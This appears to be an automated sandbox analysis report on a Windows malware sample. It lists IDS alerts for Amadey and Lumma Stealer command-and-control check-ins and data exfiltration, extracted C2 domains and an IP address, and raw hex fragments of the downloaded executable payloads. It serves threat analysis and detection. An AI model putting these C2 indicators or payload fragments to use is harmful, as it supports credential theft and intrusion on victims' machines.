Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Mozilla Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49753 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49764
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49786 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49802 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49820 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49860 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49888 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49910 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49789 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49805 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49789 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49841 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49787 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49787 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49828 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49925 -> 172.67.180.113:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49925 -> 172.67.180.113:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: discokeyus.lat
Source: Malware configuration extractor URLs: crosshuaht.lat
Source: Malware configuration extractor URLs: sustainskelet.lat
Source: Malware configuration extractor URLs: necklacebudi.lat
Source: Malware configuration extractor URLs: energyaffai.lat
Source: Malware configuration extractor URLs: rapeflowwj.lat
Source: Malware configuration extractor URLs: grannyejh.lat
Source: Malware configuration extractor URLs: aspecteirs.lat
Source: Malware configuration extractor URLs: treehoneyi.click
Source: Malware configuration extractor IPs: 185.215.113.43
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 17:16:11 GMTContent-Type: application/octet-streamContent-Length: 1861632Last-Modified: Thu, 19 Dec 2024 20:35:58 GMTConnection: keep-aliveETag: "676483ae-1c6800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ae 00 00 00 00 00 00 00 50 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 49 00 00 04 00 00 49 41 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 48 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 20 05 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2a 00 00 40 05 00 00 02 00 00 00 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 65 6b 63 61 7a 62 6f 00 f0 19 00 00 50 2f 00 00 e2 19 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 74 6c 6c 6f 7a 63 76 00 10 00 00 00 40 49 00 00 06 00 00 00 40 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 49 00 00 22 00 00 00 46 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 17:16:20 GMTContent-Type: application/octet-streamContent-Length: 439296Last-Modified: Sat, 21 Dec 2024 08:14:10 GMTConnection: keep-aliveETag: "676678d2-6b400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd b6 42 53 99 d7 2c 00 99 d7 2c 00 99 d7 2c 00 8d bc 2f 01 94 d7 2c 00 8d bc 29 01 23 d7 2c 00 cb a2 28 01 8b d7 2c 00 cb a2 2f 01 8f d7 2c 00 cb a2 29 01 c0 d7 2c 00 a8 8b d1 00 9b d7 2c 00 8d bc 28 01 8e d7 2c 00 8d bc 2d 01 8a d7 2c 00 99 d7 2d 00 6a d7 2c 00 55 a2 25 01 98 d7 2c 00 55 a2 d3 00 98 d7 2c 00 55 a2 2e 01 98 d7 2c 00 52 69 63 68 99 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 01 33 64 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 00 02 00 00 00 00 00 27 a0 02 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 07 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 45 06 00 c8 00 00 00 00 d0 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 c0 45 00 00 e0 e1 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e3 05 00 18 00 00 00 18 e2 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 05 00 3c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6a f1 04 00 00 10 00 00 00 f2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 48 01 00 00 10 05 00 00 4a 01 00 00 f6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 dc 6d 00 00 00 60 06 00 00 2c 00 00 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 d0 06 00 00 02 00 00 00 6c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c0 45 00 00 00 e0 06 00 00 46 00 00 00 6e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 17:16:26 GMTContent-Type: application/octet-streamContent-Length: 605696Last-Modified: Thu, 12 Dec 2024 15:01:10 GMTConnection: keep-aliveETag: "675afab6-93e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4d 93 ba 99 09 f2 d4 ca 09 f2 d4 ca 09 f2 d4 ca 42 8a d7 cb 0c f2 d4 ca 42 8a d1 cb b6 f2 d4 ca 19 76 d7 cb 03 f2 d4 ca 19 76 d0 cb 18 f2 d4 ca 42 8a d2 cb 08 f2 d4 ca 19 76 d1 cb 63 f2 d4 ca 52 9a d5 cb 0b f2 d4 ca 42 8a d0 cb 12 f2 d4 ca 42 8a d5 cb 18 f2 d4 ca 09 f2 d5 ca cf f2 d4 ca 42 77 dd cb 0c f2 d4 ca 42 77 2b ca 08 f2 d4 ca 09 f2 43 ca 08 f2 d4 ca 42 77 d6 cb 08 f2 d4 ca 52 69 63 68 09 f2 d4 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 31 b5 31 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 ee 06 00 00 6c 02 00 00 00 00 00 0c 32 04 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 09 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 be 08 00 b4 00 00 00 00 60 09 00 48 04 00 00 00 10 09 00 74 4c 00 00 00 00 00 00 00 00 00 00 00 70 09 00 90 0b 00 00 80 04 08 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 06 08 00 28 00 00 00 40 03 08 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 07 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3e ec 06 00 00 10 00 00 00 ee 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 64 ce 01 00 00 00 07 00 00 d0 01 00 00 f2 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 3b 00 00 00 d0 08 00 00 1c 00 00 00 c2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 74 4c 00 00 00 10 09 00 00 4e 00 00 00 de 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 48 04 00 00 00 60 09 00 00 06 00 00 00 2c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 90 0b 00 00 00 70 09 00 00 0c 00 00 00 32 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 17:16:32 GMTContent-Type: application/octet-streamContent-Length: 4438776Last-Modified: Tue, 10 Dec 2024 00:01:52 GMTConnection: keep-aliveETag: "675784f0-43baf8"Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 8e 01 00 00 10 00 00 00 90 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 da 3b 00 00 00 a0 01 00 00 3c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 4d 00 00 00 e0 01 00 00 0a 00 00 00 ce 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 4f 00 00 00 30 02 00 00 50 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec a1 60 e9 41 00 81 ec 04 09 00 00 53 33 db 3b c3 56 57 74 1f 66 39 1d 62 e9 41 00 74 07 ff d0 a3 60 e9 41 00 50 e8 50 14 00 00 50 e8 ef 84 00 00 59 eb 6e 6a 27 e8 40 14 00 00 8b 75 08 ff 76 0c 8b 3d c0 a2 41 00 ff 36 50 8d 85 fc f6 ff ff 50 ff d7 83 c4 14 39 5e 10 89 5d fc 76 38 8d 5e 14 ff 33 8d 85 fc fe ff ff 68 90 a4 41 00 50 ff d7 83 c4 0c 8d 85 fc fe ff ff 50 8d 85 fc f6 ff ff 50 ff 15 78 a1 41 00 ff 45 fc 8b 45 fc 83 c3 04 3b 46 10 72 cb 8d 85 fc f6 ff ff 50 e8 7e 84 00 00 59 e8 d4 36 00 00 6a 0a ff 15 74 a1 41 00 cc ff 74 24 04 e8 44 ff ff ff cc 56 8b f1 e8 25 73 00 00 c7 06 a0 a4 41 00 c7 46 38 d2 07 00 00 8b c6 5e c3 6a 01 ff 71 04 ff 15 bc a2 41 00 c3 33 c0 39 05 60 ea 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 58 ea 41 00 ff 15 b8 a2 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 1c 00 83 7c 24 08 00 75 07 c7 40 1c 01 00 00 00 33 c0 c2 08 00 a0 70 e9 41 00 f6 d8 1b c0 83 e0 0b 83 c0 08 c3 ff 74 24 10 8b 44 24 08 ff 74 24 10 c7 05 60 e9 41 00 2f 11 40 00 ff 74 24 10 8b 08 50 ff 51 0c 83 25 60 e9 41 00 00 c3 33 c0 c2 0c 00 8b 54 24 08 8b 4c 24 04 0f b7 02 66 89 01 41 41 42 42 66 85 c0 75 f1 c3 8b 4c 24 04 33 c0 66 39
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 17:16:45 GMTContent-Type: application/octet-streamContent-Length: 4487680Last-Modified: Sat, 21 Dec 2024 16:10:16 GMTConnection: keep-aliveETag: "6766e868-447a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 09 98 63 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 56 48 00 00 fc 76 00 00 32 00 00 00 a0 c9 00 00 10 00 00 00 70 48 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 d0 c9 00 00 04 00 00 96 3b 45 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 70 74 00 73 00 00 00 00 60 74 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 7e c9 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 7e c9 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 50 74 00 00 10 00 00 00 4c 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 60 74 00 00 02 00 00 00 5c 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 70 74 00 00 02 00 00 00 5e 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 39 00 00 80 74 00 00 02 00 00 00 60 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 78 77 76 6a 6b 62 6c 00 00 1c 00 00 90 ad 00 00 f2 1b 00 00 62 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 72 63 63 61 78 78 6b 00 10 00 00 00 90 c9 00 00 04 00 00 00 54 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 c9 00 00 22 00 00 00 58 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 17:16:57 GMTContent-Type: application/octet-streamContent-Length: 1374720Last-Modified: Thu, 19 Dec 2024 17:14:58 GMTConnection: keep-aliveETag: "67645492-14fa00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 e0 68 17 44 00 8c 14 00 e1 14 00 00 e0 00 26 03 0b 01 02 26 00 c8 0b 00 00 f6 14 00 00 04 00 00 80 14 00 00 00 10 00 00 00 e0 0b 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 70 15 00 00 04 00 00 5c 55 1a 00 02 00 40 01 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 14 00 08 1c 00 00 00 90 14 00 2c 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 15 00 bc 63 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 8e 12 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 54 14 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b8 c7 0b 00 00 10 00 00 00 c8 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 48 01 00 00 00 e0 0b 00 00 02 00 00 00 cc 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 98 a1 06 00 00 f0 0b 00 00 a2 06 00 00 ce 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 65 68 5f 66 72 61 6d ec 94 01 00 00 a0 12 00 00 96 01 00 00 70 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 34 02 00 00 00 40 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 08 1c 00 00 00 50 14 00 00 1e 00 00 00 06 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 38 00 00 00 00 70 14 00 00 02 00 00 00 24 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 80 14 00 00 02 00 00 00 26 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 2c 6c 00 00 00 90 14 00 00 6e 00 00 00 28 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 bc 63 00 00 00 00 15 00 00 64 00 00 00 96 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 17:17:07 GMTContent-Type: application/octet-streamContent-Length: 22016Last-Modified: Thu, 19 Dec 2024 14:25:14 GMTConnection: keep-aliveETag: "67642cca-5600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 66 0f 37 94 00 